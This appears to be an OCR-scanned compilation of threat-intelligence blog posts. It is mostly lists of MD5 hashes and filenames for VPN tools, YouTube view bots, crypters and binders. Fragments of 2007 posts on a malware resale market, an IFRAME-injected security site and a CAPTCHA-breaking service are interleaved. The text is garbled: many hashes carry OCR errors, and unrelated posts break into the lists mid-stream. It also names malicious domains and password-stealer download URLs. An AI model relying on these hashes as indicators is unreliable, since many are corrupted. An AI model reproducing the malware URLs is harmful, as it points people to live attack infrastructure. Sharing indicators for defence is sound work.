1cd292e65d973d7ee568811laac8d9e44 
libeay32.dll 
661b770bc4cb72ee4e4b17c5a62b994F 
libidn-11.dll 
21¢c2b1b55d24fbff03ecfb9788cObb77 
libpkcs11-helper-1.dll 
3dc18611026729397d99cdab88578fd0 
libssI32.dll 
df49cc0f2a00fa5cd2c79abd9c269796 
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msvcr90.dll 
e7d91d008fe76423962b91c43c88e4eb 
openvpn.exe 
aeac56ca08bfcc12e51485e637558846 
openvpnas.exe 
bef7d9760e0b00973e0f7efce68875c1 
openvpntray.exe 
4eb0582dbe5921a3055cff341ae0a660 
tapinstall.exe 
9966abe4ecd20028c95adflc1l6a3cbbb 
vistahlp.dll 
22894d21c228b55b334024e95fa2490d 
wddll.dll 
8b1d8b21d501698a9639514792ad10d5 
zlib1.dll 
c7d4d685a0af2a09cbc21cb474358595 
gui-ara.dll 
bc0a209540837e60187d29c52bee6dc8 
gui-bur.dll 
18bc585c817ba9326d6a373fb1605da0 
gui-chi.dll 
cf996a61de7cdc9cal190e331363a5c4d 
gui-eng.dll 
d0ba9d0f45ba2c2cc3f019957d265d61 
gui-fre.dll 
2c07ddb89be5de101699c7c92fe22991 
gui-ger.dll 

df63c8fldbd1f60cd3b297 7b06e64baf 
gui-jpn.dll 
4edfccf6ald980abec357212f92c74d7 
gui-per.dll 
0d6f4219c5237b4645021b728e0c2634 
gui-rus.dll 
c0899bb8b5d1aa565e0232eabdda20f2 
gui-spa.dll 
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62al1ba5flac5d082792e64bda86047ff 
gui-tur.dll 
b40b54f1f2c938ed5dbdcbef9f40e5e8 
gui-vie.dll 
ce233fa963f5cc37d1c2871e2bb60ff0 
config.hvpn 
68fef3cd2027216eec3f05364f45e056 
icooff.cfg 
df550742c69c119b74f1a56c20d387e2 
proxy.hvpn 

sd-info-main.cfg 
b1980d8bdbce0cf17d625a07fc9f54de 
sd-info-saved.cfg 
31b86464151e015f33698c9505f8c9e6 
update.cfg 
907728e458dcb34d6ce02aa1340a46b8 
upd _dat.cfg 
74342e8cf6a5d67084cbe5d69d148d99 
4ea395ef7506cebf402e3877a17663f4 
b2e29df2e6c3e60cffc782362df27157 

f 4ea395ef7506cebf402e3877a17663f4 
e1b5a0albd5e208f061f96dbadf4215c 
OemWin2k. inf 
92a59793183ff37e2926ba6b4ae8b896 
taphss.cat 
a8113788c5e049290a4a99969e4b44ee 
taphss.sys 
fd90al6ceb10d4fdaa00aaf39b8ff58f 
config.txt 
f31a5cb40226cb8657e480c092c89fdc 
HssIE.dll 
e0872cf612b8ealbc1cf057854d36b0b 
default.cfg 
92f958fafe7ee6c7d1c15b5919f5ae6c 
hssdrv.cat 
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[2]The market gets even more dynamic with the possibility for the buyer to exchange the 
malware tool he obtained at the over-the-counter market, and by doing so to limit the tool’s 
exclusiveness, risk to have its value come close to zero if it leaks online, and most interestingly, 
his actions would have a butterfly effect on the other four people that hypothetically paid a 
higher profit margin price to obtain it. Given that the seller is interested in a higher profit 
margin only, he could either increase it and sell it to less than five people thinking that the less 
people have it the lower the chance it will leak or get exchanged, or if customer satisfaction 
and long-term relationships matter come up with a strategy on how to ensure the tools remain 
exclusive, though educating his customers for instance. 


Images of crypters and joiners are samples of currently available proprietary malware tools for 
sale. 


1. http://seclists.org/fulldisclosure/2007/Aug/0411 .htm 
2. http: //ddanchev. blogspot . com/2007/03/underground-economys-supply-of- goods .htm 
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d078c2a6e911f227eb673f6b8e5095aa 
hssdrv.sys 
6361f419c1dfd5141702a90d93dbf569 
hssdrv _m.cat 
2f4dfd617799190b421a8b7216825fc6 
hssinst.dll 
a11704e9ffdf72ed8cb63154e550d634 
HssInstaller.exe 
b4c7c077a60e0bc9a8a983081f553a44 
hsssrv.exe 
01947d3cbafcfef066eleb45dadc182d 
nethss.inf 
2ca623c5d6ecb7242c59c5183ab46121 
nethss _m.inf 
d93baf3f92124b16e3255a6a720bae39 


wpr.conf 96d18883f9d4f73bec43868943d0f77e 


blank.html 
1dc7c100468227a46abad10232b00fe8 
btn blue _bg.png 
d0d4f53efa86f9e7904e94ca55d884a2 
btn _close.png 
ded4a1a87629a5e028cae7675c6db1c8 
btn green _bg.png 
48cdfbed26d7eef2cb3ef34fdded26c2 
btn green big bg.png 
30d8dca759b0c7406746049da4c517d2 
btn _help.png 
1392c71c4b4337cb1d1lbeb253f72cc8a 
btn _info.png 
d1b4e7f67eca9ac807c6delleaeef6cc 
btn _red _bg.png 
f34c3b3fd420c6ab39ad10105b41a84f 
btn _settings.png 
178af43571a0b6d958154a14210576c8 
btn _share.png 
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096c5c320da9d3c8178118db43c8ccac 
chbox _off.png 
7b6c8c2756c7e8c5d55ad47399f306935 
chbox _on.png 
0c20102fbac38d640fac637acda04647 
common.css 
fo9e9ce758187b2587272dc6e3022d01 
common.js 
499ba2bdala3f07e15f361a8c0d04089 
connected.png 
05bd5cac4b1e924076783013bb2d8ca0 
connected12.bmp 
c7O0dabf6dc229c60f5604616c2c4f119 
connected12.png 
f71¢8984244cff225afe4a79797 4fdcf 
connected16.bmp 
847db63ce4462021bfdal77cd758bdaa 
connected16.png 
908bd68e8aldcf380f935c23acd26f80 
connected20.bmp 
c543c5c9d4ed7fd1024bde329b711d64 
connected20.png 
b17f7f1d90c943f2ef203333373c2766 
connected24.bmp 
5b9b37c17d0ff5f4becdb8ec2e60cl1 ff 
connected24.png 
7630b3602e62f8811456043516bffa54 
connecting.png 
f9730ffd3fee53bea2f35ec7e50ac65f 
connecting12.bmp 
36f44135a7b937c60177ed047ddb405d 
connecting12.png 
e70fce8828e3c838c315a2b44186ca70 
connecting16.bmp 
14e805c26bdfcabf29a0212de5b25255 
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connecting16.png 
c64118992b3fbade72bfab8f728e05f6 
connecting20.bmp 
5cda60b8a410a1d979627628f6585932 
connecting20.png 
laca4eadf8d3a78db6dbf08a3dac7a/e 
connecting24.bmp 
37d67448b4fb44ff22b65b3f07200ebd 
connecting24.png 
eb0e2blac0f9a489dc222flb3cd4a2bb 
disconnected.png 
19a7c12d5ab56493ad9301140a4fcf5c 
disconnected12.bmp 
5b0001a49a492e181fe28496682b0e6a 
disconnected12.png 
391808091a6a44d3dala9eb4fec58606 
disconnected16.bmp 
a5aa81d6f4df606adff94c9191aef8cd 
disconnected16.png 
f78bbdcda7c364937b506fcc50e5c5cf 
disconnected20.bmp 
10b3ac85085fe0eabbe71c8b478c2505 
disconnected20.png 
45206c2a525578ed81661lea5b22c60e6 
disconnected24.bmp 
b7721caef29d05535ab58384ade8f307 
disconnected24.png 
8e87da770a851bed0493535517af8f56 
elite box.png 
351d2ed5e9d0f3c23db9159626169aa7 
elite _sign.png 
a166e1d93b0273026b15ca0e3a9554e8 
elite text.png 
d8084e6370ea2669ab7efaca26f8c88a 


error.html 
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424ff75b0b5fe8e7c91868592e017e11 
faq.html 6f7cabbaf903ee51bf3406110da4daf2 
first _prompt.html 
0115096c2c29c4afaca2f3281be4b2ab 
greenico.png 
3279afccb836fb54b441395eaa51dcbc 
green btn _point.png 
04f759b2ca1941edc010fe6836eb2b81 
green _btn_point _big.png 
4d921ad95952e08d3abc516713249753 
green shield new.png 
8561f30b7f24690ba6188edded30b33d 
green shield _tool.png 
0c2252cabe9d921ef3647626630228db 
green tape new.png 
0188a29e86545e425cb29al149d6caae7 
hover.html 
57be5a7a41cc776f76f926171eae4173 
lang.js 
07a95582b3822e38ece1f323f9e907a7 
logo.png 87f6b2db0c4489ccb8633807cfb6f38a 
logo2.png 
ffefflbbeed392b9b2d2b86b34b9Ff7 3b 
mail.html 
5880f7a890967b1127544c5899f68f9b 
main _bg.png 
8a5e61f53ce070bd9ddb85dd4253e919 
menu.html 
9fb81d3ecd0cc705flaae69610180ffc 
message.html 
b9bac665ada0aa08e55556535328d9e9 
oac.html 5f8bc89910835a5fdb891654499abel7 
preuninstall.html 
629c2bc7460e0d0b23e08b850c6b1302 
progress.gif 
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d19cf49418839ae6a822f66898b4de6d 
prompt.html 
51053b7ded426bfc4dc55c0c724b6319 
radio _off.png 
a923b9bb7e4e6d6b6bf5a240d3al175d7 
radio _on.png 
6b60c4be66ce8529df84700bd6251a5f 
redico.png 
04a6e59d862203cafc7ee28ecce3d150 
red _btn _point.png 
d2df2cf16c043d18cf3077b6ccd82718 
red shield new.png 
219224f66287b77f35252570877e38f9 
red shield tool.png 
d3ba77a9d90dbf7c3cOfbe48396e077b 
red tape _new.png 
62b36cf826f02bcb533db094194147e0 
settings tape.png 
d9c6a6f3b1685417144814b502b64526 
t.png 
735a36739dflccc87e75e6bfef201d9e 
tooltip.html 
91de822b5cdd35089da58ba35bledc88 
tooltip _bg.png 
bb99d14673742cab8fa4df5026988ae3 
updatestatus.html 
237d8d0ddb442856b8d2d9d76c939d34 
up hss _logo.png 
367b098bcae8e936cc6d2ae2cc655015 
yellow shield new.png 
dc2a24ca709c350814161364bc5ecb04 
yellow shield tool.png 
5b76e06022c0efc6ecd0d9bc6132c6a8 
yellow tape _new.png 
802e903ded5b271319bfbcb701956a0c 
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yelred shield new.png 
676cf0f3221bc1c7321a84c745a05f1f 
yelred tape new.png 
507b53c20449a163331b4195558fb860 
config.log 
0a6cab7e16c205a0324224e8c88a9569 
oas.log 
8a6e5552582441a97eb1b6a623a330f0 
hss-update.upd 
6977873f549e0427fe47c529e8f24b06 
RealHidelP-4.1.8.8.Setup.exe 
110403de3f36a8b787223713087ecfbf 
const.dat 

702129727087 0ff637adb018300d48f6 
ffextension.xpi 
876cf21a4a5047db9bc866e8da006f35 
RealHidelP.exe 
53c2e1d02cc4654f956aa62f66d844a9 
uninst.exe 
e5071df2b4e00816efa922d7831e4b72 
English.lan 
elec8731f4eb5f2aeb9ec605f3alf33b 
background.png 
6a855a45803d36457f6813d8e95d770c 
hideip.dat 
3b21bd87e6f6b20ba61fad6743450db3 
logo.png 71a5465a88a2664911c95c6e82e98e09 
map.tpl 
151b7979acbb739a2022a8ec6c148d10 
trialnotify.mht 
c571bab2deb4db6918e612d7f1d1a258 
200868112135624.png 
7bf50e624be74d82bfc5575af840623d 
200868112138779.png 


€43572449285a07fd85b7d33b834e9d9 
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200868112139176.png 
b0052bdb92a2534e8a682e0094957f27 
200868112140701.png 
10b51c40be1a99a86fd4a3597bf2a7 6f 
200868112142681.png 
a416aa68f2982e49136abf212d425292 
A.PNG 
d00af0be859543b0029e72d19e1d4183 
AD.PNG 
70a447ff3d43ac3b9c96fed3483a90e6 
AE.png 
af72d6e89af521c09142f9fdb5f8804f 
AF.PNG 
210e44fe0c073bb1dff008599bb97303 
AG.PNG 
4f4d1378b51da3518c160c7a34547d78 
AI.PNG 
2c¢37b0aal143b2d974f13e0a89cd0319e 
AL.PNG 
98eaee2c1bc36d341ed0234f907b03bf 
AM.png 
cc08d796aa619989d75df3f7363af905 
AN.PNG 
c2fe6bd27ala5el6falf5f9b4df85139 
AO.PNG 
0ef5995c45e7b0aa0331a33cfdbed0ed 
AR.PNG 
50e21e0829afea663fbab19a74468e59 
AS.PNG 
8ad25e2d4a381laba960eaf0b55434bad 
AT.PNG 
e5a29e352ceb6574e469797c479f26c6 
AU.PNG 
964491bd05cad4be7d1le6fl02beaea07 
AW.PNG 
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1b8ela2c87adlad2386db3ebb0d47c25 
AZ.PNG 
03239dfd35c3cbdc7129924543bc59cb 
BA.PNG 
a027183a40dc5028ab7329133e224aff 
BB.PNG 
ba56641lef5aba7c3300753e0a97d9a46 
BD.PNG 
deb974ecefdcldd11c2f4fc79ebf11d6 
BE.PNG 
a9d3f0d9321ec5147956471e219196b4 
BF.PNG 
baf24b0939e153cb58e47a4b4d86dca0 
BG.PNG 
e1c68349ccda76049cc950c21a9df915 
BH.PNG 
cbc0b28b021269758cdafb02e65770b8 
BI.PNG 
afec930802bc9cf5a83fdaa9734f86b3 
BJ.PNG 
a96b16d9acdf28655e18237df1572b9a 
BM.PNG 
26841e9a3398667812db7282f9b11255 
BN.PNG 
74bacdd48b97e5d36baf84f4f41df350 
BO.PNG 
bf061c574ba9d3c616f51bd6682a0ba8 
BR.PNG 
a6429be56de9001c4f2efd2199ded4el1 
BS.PNG 
4c9d340f9aa7f211e31dc2892037b61e 
BT.PNG 
a15bcb383e4719a6042367fec127999e 
BV.PNG 


799521385f4018a4a1835758424cf17d 
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BW.PNG 
b2670ea128cb9c5dec4f380585c49412 
BY.PNG 
90bc8c346a0187ac5ae78c2668f4ab31 
BZ.PNG 
6914b1a5446366c810e7fab6flffeb0c 
CA.PNG 
1d291ec645c5e2ad2942cf198e81d0c9 
CD.PNG 
1830904a647b73ecb039733cfac996b4 
CF.PNG 
16031a470ab5185a1le4c60dd25ded529 
CG.PNG 
557924557250989801bcc955392b9f34 
CH.PNG 
5d10d21ab2afc2a4ea9713c2a0542d83 
CI.PNG 
b33eae82cf2158cd53dbe08ff436e512 
CK.PNG 
47ae4ba32a1078c6602ad41fd4e3745b 
CL.PNG 
b5a98a981e4d3a8b276664f4a2b00f29 
CM.PNG 
00e89989c67a8fa67f38ba9a8ed5dd79 
CN.PNG 
83aed9b217d1dfb725b7143ee6a62af5 
CO.PNG 
2945215927e88360c7561115858b6ccO 
CR.PNG 
68221celbe1f2d8b944f555487224f7c 
CS.PNG 
Oc8ff3674fc42b099319fd2ba8d6c452 
CU.PNG 
ce63c3d5ef9a9ca341e02771f23e5734 
CV.PNG 
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544af614796b7c97576daa889975379e 
CY.PNG 
7641f4e513330e9158a69855c5323b33 
CZ.PNG 
d95fce36a9ad61fb91b1f272b9f1702e 
DE.PNG 
8b4b28765ba0fb6c77633fa22bf47503 
DJ.PNG 
972e486384b64fee6bb57e27ab38e81f 
DK.PNG 
db6ebf06523e478c0b537ee3d02ac554 
DM.PNG 
e€c149260b89d5f0204198a207c615035 
DO.PNG 
dc594c37fc15ddacda8d8aa24797e656 
DZ.PNG 
9dcca6360e60eb98aeffo28904b805a2 
EC.PNG 
db393f0e9b5d41d83ccd54fa75b84ba8 
EE.PNG 
318ad6a8ed9a62615cf1498de371f6ea 
EG.PNG 
9d2e7743f7ecc313ad6757842b5861d5 
ER.PNG 
b27e90996285280bf1b69e1bfl8eec01 
ES.PNG 
aa65fbc48bd93519e8d66b22f9141cc4 
ET.PNG 
2ff692bffb7e433ela2e7202aae6b728 
FI.PNG 
cb39b5c93afe4c39c1fa4d9869e6e654 
FJ.PNG 
75f62140e425dc7800fcc4579d1540c2 
FK.PNG 
72b5eae1b05d49ee8307f9abab6db680a 
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3.10.3 CISRT Serving Malware (2007-10-03 14:20) 
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HEWR!, Powered by Ajiang net MICPL!/05009218 8 


The [1]Chinese Internet Security Response Team is reporting that it has found embedded 
IFRAMEs serving malware within some of its pages. And despite that the blog itself is now 
clean, [2]Trend Micro are pointing out that the main index is still IFRAME-ed and that the 
attackers took advantage of the momentum during [3]China’s "Golden Week" holiday. 


IFRAMEs at the main index lead to : 
js.users.51.la/392481.js 
51.1a/?392481 
img.users.51.la/392481.asp 

IFRAMEs at the blog used to point to : 
mms.nmmmn.com/99913.htm 
mms.nmmmn.com/30000.htm 


mms.nmmmn.com/11122.htm 


and ganbibi.com - where the twenty password stealers for online games located at 
ads.ganbibi.com/100.exe to ads.ganbibi.com/120.exe in numerical order are still active. 


Related posts: 
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FM.PNG 
8e6f0eea6a3d5563cdf7eeca942e8356 
FO.PNG 
a420915a6850f944838f43fdebd15926 
FR.PNG 
a297c88bf013cebd323fb21a3a5c836b 
GA.PNG 
07f5924a1347d9f26d5d8af10bb4d7ea 
GD.PNG 
6fa5e7965139288b9e4497df7832adc4 
GE.PNG 
0925a15b8e0b95951631259dd3711869 
GG.PNG 
1f47265a08dc9375bbbd4a73bbb76662 
GH.PNG 
1215395ee874d5876a31815249691afe 
GI.PNG 
bab05a222f2ce834929c0eledle0eb0b 
GL.PNG 
1e6e680c74134075284d9f5f8ef8c16c 
GM.PNG 
db858ebe89f256c3f5081f166324434b 
GN.PNG 
a5d33e831cae5f74b07ae7ac07b63b86 
GP.PNG 
a297c88bf013cebd323fb21a3a5c836b 
GQ.PNG 
ac33c34ec15f23fe849a9604063892df 
GR.PNG 
baeaal1370296760fcca8f2fe2874a3b6 
GT.PNG 
c16f96c687fac83206e76ecd21e21778 
GU.PNG 
6490464a5290232d3c0c99b9058760e5 
GW.PNG 
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dlef9dae041966641e675f46d48563d9 
GY.PNG 
dd80c4791df43alfc635ebcbb1f40ce0d 
HK.PNG 
aebe9792a384851040ed28a4el1ef4999 
HN.PNG 
82574302f0950301e7c97c83e7880fbd 
HR.PNG 
5236c06969a24a4a014924661c02dfb7 
HT.PNG 
731fde8c87d0246a556e7933cal3205f 
HU.PNG 
ce36a19311b9773fbad4a09aa43bf62b 
ID.PNG 
46d14b63201d9dae81bad7a22be81leeb 
IE.PNG 
f0043976e9743cba890e0d3453803615 
IL.PNG 
be97b72a978f41ec1e0767ae32d4f15b 
IN.PNG 
71710e714537dba786f37b8588686982 
1IO.PNG 
d875734037cc41888818003cf316e658 
1Q.PNG 
5832a13c2c1fd53a9fca29408bdal1720 
IR.PNG 
33a3fefe26892578767cf88598011d9c 
IS.PNG 
d5874cfe4b034f4a19a9efdcf832e6db 
IT.PNG 
26b9bdebelal66bb603c14c9240e7613 
JM.PNG 
763bcc75de0633c7d909921b454a517c 
JO.PNG 
6c8da00806d91e1a396fbf40605ad363 
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JP.PNG 
c30c87d45fa2f4a43dcfe4e479b8c9c6 
KE.PNG 
6c17b2d07bce4bfe679868798cdac4af 
KG.PNG 
af6flcd54ee680dcfb354fbbfb9fcedc 
KH.PNG 
9838c8d3972d8718041615517fca004e 
KI.PNG 
512254f6e88d2eb88e50b71e27fd4a8b 
KM.PNG 
lalfdb3d477c80c49484db5623bf25ba 
KN.PNG 
882dbd7e72deaaaa4f36cdc4e03ef300 
KP.PNG 
c04885780f837cd18d5d48482d3339ca 
KR.PNG 
4286e5cebfae48be5857d27c58997f6b 
KW.PNG 
d2ec2e1356ba262fa07a64dc3fc796dd 
KY.PNG 
d30288e1419f56426e4a942464220738 
KZ.PNG 
a1066cca42443bd657511ab0dea821a9 
LA.PNG 
69469eef7fde25183031b0d919787174 
LB.PNG 
9f24a417c655be6787673ee612ca2a96 
LC.png 
a6254069c2c3e33a963a9c044c11dc48 
LI.LPNG 
2a8784f3492de6bff72902a770a0ab6ca 
LK.PNG 
cb659a9d0db7ac3e74aef5785ad2a991 
LR.PNG 
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33ca0a9765498936b51447e66bc68927 
LS.PNG 
c9fb5aec4563f288ae5521dc607a7439 
LT.PNG 
€9a321f4431a7875e48b6de03c79adcb 
LU.PNG 
e52671a2b2fb2a99ca91b9960dcacale 
LV.PNG 
0d9c055a82a935a05449d45e796b81bb 
LY.PNG 
5883090344f601409a93d046edbd19da 
MA.PNG 
fcOd06ce9344e2bda44eac5c995384d4 
MANN.PNG e7ec6ac711d63d5d80a1a238991dedd3 
MC.PNG 
f36d172f7613e3289ec71fd5127394b3 
MD.PNG 
16c64dd2468cf8fbf9c6f341f430539a 
MG.PNG 
f7350cecd7eaf33deb8eb9d147c54445 
MH.PNG 
958ed1ae6c276d7568c6265ba4229b08 
MK.PNG 
4c2dd7f604a5d958a92a04982b35calb 
ML.PNG 
4a70c61be5a8e532ccc416f56464b67b 
MM.PNG 
Oef5f2abc7f054b7bd57415a767914bf 
MN.PNG 
2b623c308cc8c54c81f69bc543e3781e6 
MO.PNG 
7ba2f2581663f907bb4a88d922057c07 
MP.PNG 
a2c49d71c13aaf506fe886277d0cOabf 
MQ.PNG 
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f3e61027bbc582946007ee007334a0ec 
MR.PNG 
491d3affeldd8aebd386216d1e0a05f4 
MS.PNG 
e88e7a8e3256a54c199444238330d0e2 
MT.PNG 
4e99986b5f1d302ffbf9f65c6d90340e 
MU.PNG 
f9b197d40906ee2a84af8dedb0d45611 
MV.PNG 
3476bb573aeffabea5eb6ff9afbbf9b2c 
MW.PNG 
77f81a42a429f4aa2256aca3c4820f79 
MX.PNG 
5c5fle37daa2bf192cf854f675755b8b 
MY.PNG 
diddc50ac2d63ca0ceefe7cc5714c53e 
MZ.PNG 
1d5846bc6636b1a1c150a9c576b30f40 
NA.PNG 
b06126086021abblaabad27f80175d42 
NE.PNG 
c3860aae3a3d180630e9bf844cd601d3 
NF.PNG 
be744459125b0734816e86c6e4a9a6e3 
NG.PNG 
106b9d391eaa60187c54704c84eef7e8 
NI.PNG 
76f3d86d815ac88f0eb7a8ad262cc056 
NL.PNG 
a6d003712503b63ee96646d9adbb0724 
NO.PNG 
713ab9c35a76a29481cae998062973e9 
NORTHERN IRELAND.PNG 
ba09650d88278cf47cf737d26943dabf 
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NP.PNG 
eb8c65df606aa655adcl1dec85314abf8 
NR.PNG 
019d8d9391ec86754e46b774a0eb1130 
NU.PNG 
acc5beb5bdb57991e5849bd712a5731le 
NZ.PNG 
lela0beOefd0d42535efb3fa42866259 
OM.PNG 
d2d638348b0b7c5f794fe39ccce49863 
PA.PNG 
b5e987cf2ee35a2fcfd1cd0210d32031 
PE.PNG 
003ddb44b3b150417fa5c51b2ala6a0f 
PF.PNG 
88fae52d44345607f05237bf7876534a 
PG.PNG 
0e1819114f41a1b5f8981fdbe6c2bb26 
PH.PNG 
4c87beab9d28218af9b1da148b18c7fe 
PK.PNG 
b7d57a111b834a0545c19c8831457e04 
PL.PNG 
7f30be647554239d0af0b069d9e66ba6 
PN.PNG 
€84579361bd7f033268e9eae8118394F 
PR.PNG 
422fa3fab0able41b5678b1cf75638eb 
PT.PNG 
302b3a7e7380b88aa98949c53e0e9d18 
PW.PNG 
9b3dbc10aa40cb1eb5406be327b5aae5 
PY.PNG 
4698ea6dbd90dd51f4938c6d776a9439 
QA.PNG 
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f587a43fb205a8ad9a4f52422ac21d9d 
RO.PNG 
e€079770186e0ffalc789e9fd270cb662 
RS.PNG 
cf8d4c042e5457be5c2650b493232717 
RU.PNG 
2669741f309f11106708a2d8fe3df046 
RW.PNG 
9f9ccdc12e6370188deaf280d5dec3d5 
SA.PNG 
bad7966643fle67c7eb9dd78d74bab2b 
SAINT HELENA.PNG 
5bfa5c0b3868ee7666bccb1f7ac4e38b 
SB.PNG 
1fd469ccc869a7b3bb50aaec3136d1ce 
SC.PNG 
33bf662bf3c7b2256f4532a2ef34581c 
SCOTLAND.PNG 
3437aab7b1dd36951b82f08f0lef2ce0 
SD.PNG 
254c7857954ba7e9f93b1c9116f12883 
SE.PNG 
4e569d830bae89aelc5e3a285e176867 
SG.PNG 
68a2a6a926318208aef38f64d2f92920 
SI.PNG 
4eea2ad41155fd7975aa58b8397390al 
SK.PNG 
c543ec2e5ca3d5cf2a2f128902360a23 
SL.PNG 
4154205195a63d98212442dd0afed9c8 
SM.PNG 
98dc28ea3f70b3f9179d5e39ac998add 
SN.PNG 
aflca353ef64a049e8c926d9f812d08d 
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SO.PNG 
1ldbccaf79d2f028e8096c32fea810e35 
SR.PNG 
ad0645f574a4b50aad564e70b24e5acb 
ST.PNG 
bad17327fee986e347985a2814bf62d0 
SV.PNG 
85018fd6flb7ebcd85d0b46d7423bdel 
SY.PNG 
8ac221db4d995744e7bcddcf00158d90 
SZ.PNG 
02eb0e0b16715d1f49b22efc3e20d48d 
TD.PNG 
b2efde493f9e06e4 6ff9b4 7bfc9f18d7 
TG.PNG 
b73b7b5eebf429ea5760304b8deaefcO 
TH.PNG 
9c57f1871c18a3d4e8bdd56d5fbd2c27 
TJ.PNG 
c24af11d491f960235f5648e227b21d9 
TL.PNG 

87a8720a97a4816d692eb95 1cde8ed28 
TM.png 
cd5945407899da269ff6ae65cce5ddla 
TN.PNG 
c0bc3c89269191c28313820b2db34124 
TO.PNG 
O9bbbcebfc99b35e562bc7c4c8a2863a 
TR.PNG 
33c9f5f19fc434f865e7dec8f8dd9d9e 
TT.PNG 
d2e5b5ebb9e6da3cef0378394cfad001 
TV.PNG 
07fd0a23706e8f347644417301004fd8 
TW.PNG 
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c4e4dec9b7493197d9f697afaae23828 
TZ.PNG 
61c4f769e865c05dd0ec5b3051130712 
UA.PNG 
23be81802cd958d4f15e61f2a613a7d5 
UG.PNG 
3abe62045ec2a41649ec8d1077b28f57 
UK.PNG 

26ec6cb808e67df5 7f0a3c518dff5aac 
UN.PNG 
5063d623ffc1610ef7db8207e2f48d94 
US.PNG 
efc772a66d22f08ba04d04a22fcdab4a 
UY.PNG 
c622df9a7cd6le2e3ca89dFf4389e66cf 
UZ.PNG 
7dac6c782185bef1d150acf3d0641960 
VATICAN CITY.PNG 
c9ff51df665a4468e87ec4aae5f8d9fb 
VC.PNG 
6cdc5f24c08444eb6174d1e6707a5752 
VE.PNG 
68a57815ee1000c3d38e1238694ac3b5 
VN.PNG 
86821ceab4cd69f04be7b089bee35b5d 
VU.PNG 
c2f66b01fd51986292b97e352b496cf5 
WALES.PNG 
b925131aa892b4b18000bd2ff17c338b 
WALLIS AND FUTUNA.PNG 
44fed96787ec115b753ad6c7620cbc2e 
WS.png 
9e80e8e026a6e892Ff05dfcO75df621b 
YE.PNG 
513ed5ff874d26442e54b5d2580f95f3 


10881 


ZA.PNG 
650665739c2a6c32668bff28a84cfdcd 
ZM.PNG 
c3aca5fbdb265f75f2bcceb335810ecf 
ZW.PNG 
596a9477c4935dc75631e016f47a37e9 
about.png 
4552f8e8f3cb2376c8804cadaba5df2ac 
default.skn 
d750a364db58cb05b497572c96ac137d 
YouTube View Increaser v3.exe 
1506fecf5c939a5258120cf020181da6 
Aspire Cracked.exe 
1124c1a9569e7901laee6c4a0e68ce443 
CaptchatTrader.dll 
7b61dc121c821c1f0b3c9142f6a807772 
DeathByCaptcha.dll 
a8decf9a5224720471725f57b41fe5cb 
Google.GData.Client.DLL 
0b96d75b2b239c8b0e2fc91b0c0555e8 
Google.GData.Extensions.dll 
d3877817bd8365568e18af97aeldle2e 
Google.GData.YouTube.dll 
27a9276b607328044d15b539be889cef6 
HWID.dll af6667521f704bd28ce09a0934b710a2 
Interop.MSHTML.dll 
2b3b765e01456efaccal84176361b5c4 
READ ME.txt 
f383e8605286a196c0969505548923c8 
system.web.dll 
b01b4258568ba3a406205544f8ca751d 
Username 42367a02291c10c3060312aa191daaf0 
youtubeAccount.txt 
e€997117f06c763f60a3a1d277067abfc 
Emaillds.txt 
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[4]Bank of India Serving Malware 
[5]U.S Consulate St. Petersburg Serving Malware 
[6]Syrian Embassy in London Serving Malware 


1. http://www. cisrt.org/enblog/read.php?172 
2. http://blog.trendmicro.com/cisrt-under-attack-2agasps2a/ 


http: //www.canada.com/topics/news/world/story .htm1?id=99936605-ef45-4f62-9f73-44b466697bd3&k=80756 


http: //ddanchev. blogspot .com/2007/08/bank- of- india-serving-malware.htm 


. http://ddanchev.blogspot.com/2007/09/us-consulate-st-petersburg-serving.htm 


Oy 01 


http: //ddanchev.blogspot.com/2007/09/syrian-embassy-in-london-serving. htm 


3.10.4 DIY CAPTCHA Breaking Service (2007-10-03 17:53) 


: A . 
Cxpunr perncrpaunn - At Captchabot 


Given that spammers and phishers are already [1]breaking, bypassing our outsourcing their 
CAPTCHA breaking needs, the introduction of a DIY ([2]do-it-yourself) model provided confi- 
dence in the recognition process is over 80 %, was inevitable. The CAPTCHA Bot is a good 
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cc3f97261bfbe2160ea007e39b68f3d3 
Username.txt 
Of4feb63d729e50c18f71481c56ac86f 
2.gif 
3b9c981bda0c2ca22220c232b5f89515 
Google.GData.Client.DLL 
0b96d75b2b239c8b0e2fc91b0c0555e8 
Google.GData.Extensions.dll 
d3877817bd8365568e18af97aeldle2e 
Google.GData.YouTube.dll 
27a9276b07328044d15b539be889cef6 
Youtube Blazzer.exe 
b9aal28eecd64cf2b95c16f495170375 
Change log.txt 
58d0f08d1e7ac67al1fd33cc82318328e 
Readme.txt 
11bf0cfb3a83406c36321e7eCc2637f97 
Youtube View Booster By idulkoan.exe 
456773ef51f0e5f2877ce710386b7adf 
New YouView Bot 1.2 Updated [ Read First ].txt 
e€33bb67620c9148cbac9548357257fd5 
YouView Bot 1.2.exe 
ef37ce8d6fa68d2c191773714faf3b34 
Stay tuned! 


1. https://1.bp.blogspot . com/-t7SR460w-vk/X9SJnFfGepI/AAAAAAAALPY/6Ruy7U11Q04eW1lst6gvzZk6hQBx5fM-HwCLcBGAsYHQ 
s983/Misc_810.png 


2. https: //ddanchev. blogspot .com/2020/12/exposing-modern-client-side-exploits_12.htm 


16.10.24 Exposing Modern Client-Side Exploits Serving Kits - An AV and Snort IDS 
MD5 List Compilation - Part Four (2020-12-12 14:18) 


[1] 
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Dear blog readers, 


This is the fourth post part of my "[2]Exposing Modern Client-Side Exploits Serving Kits - An 
AV and Snort IDS MD5 List Compilation - Part Three" blog post series where | intend to share 
actionable threat intelligence with vendors and organizations with the idea to assist them in 
protecting their networks and the networks of their clients and customers. 


In the fourth post part of the series | intend to provide additional MD5s for some of the high- 
profile and currently popular and in circulation hacking tools with the idea to assist vendors 
and organizations on their way to properly protect their infrastructure and the infrastructure of 
their clients and customers. 


Sample MD5s for some of the currently active hacking tools currently circulating in the wild: 
0 Crypter .exe 
42e48811fac44aa61d558b11f5f5c507 
Cold $eal 5.6.exe 
d0bd7a3ddf01dc742a2035cca247ba34 
CpanelBruteReiluke.exe 
7c80b62eb75e6e5bf93774c3008de2c7 
DarkBinderV1.rar 
0248396da4aa6018dec53905c907dbb8 
Downforeveryoneorjustme.exe 
4b2b4eb0806baf06ec743d5e84b902fa 
Get MAC Address-2011.exe 
89e6cc23a3f8f8b6809879Ff1b20124a6 
GirlzSoft.exe 
7fc00c46a7e0c8d8b9b276f01a67ba09 
High Life Crypter.exe 
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cfb30f9edd5db91983e7d2961899f474 
iBinder.exe 
deb9249b0fcc0d55813e4af7a87b2dcl1 
join7 ShellChecker v1.0.exe 
b956d8e606d80e5626efa9fced36b152 
Mr.DarkSoul Code Converter.exe 
779229009942a3506026cO0fc6f845e58 
